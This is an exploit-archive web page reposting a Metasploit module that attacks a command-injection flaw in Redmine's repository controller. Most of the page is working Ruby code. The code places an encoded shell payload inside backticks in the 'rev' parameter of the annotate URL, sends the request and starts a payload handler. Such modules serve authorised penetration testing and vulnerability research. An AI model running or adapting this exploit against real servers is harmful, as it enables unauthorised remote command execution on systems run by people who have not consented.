首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Redmine SCM Repository Arbitrary Command Execution
来源:http://www.metasploit.com 作者:joernchen 发布时间:2010-12-28  
##
# $Id: redmine_scm_exec.rb 11414 2010-12-25 14:43:13Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Redmine SCM Repository Arbitrary Command Execution',
			'Description'    => %q{
					This module exploits an arbitrary command execution vulnerability in the
				Redmine repository controller. The flaw is triggered when a rev parameter
				is passed to the command line of the SCM tool without adequate filtering.
			},
			'Author'         => [ 'joernchen <joernchen@phenoelit.de> (Phenoelit)' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11414 
, 'References' => [ ['OSVDB', '70090'], ['URL', 'http://www.redmine.org/news/49' ] ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Space' => 512, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic telnet', } }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Dec 19 2010', 'DefaultTarget' => 0)) register_options( [ OptString.new('URI', [true, "The full URI path to the project", "/projects/1/"]), ], self.class) end def exploit command = Rex::Text.uri_encode(payload.encoded) urlconfigdir = datastore['URI'] + "repository/annotate?rev=`#{command}`" res = send_request_raw({ 'uri' => urlconfigdir, 'method' => 'GET', 'headers' => { 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'Connection' => 'Close', } }, 25) if (res) print_status("The server returned: #{res.code} #{res.message}") else print_status("No response from the server") end handler end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux Kernel < 2.6.36-rc1 CAN
·OpenClassifieds 1.7.0.3 Chaine
·Microsoft Windows Fax Services
·Kolibri v2.0 Buffer Overflow R
·HttpBlitz Web Server Denial Of
·DD-WRT Information Disclosure
·IrfanView 4.27 - JP2000.dll pl
·Mitel Audio and Web Conferenci
·PiXie CMS v1.04 <= Multiple CS
·Microsoft WMI Administration T
·QuickTime Picture Viewer 7.6.6
·DorsaCms SQL Injection Vulnera
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved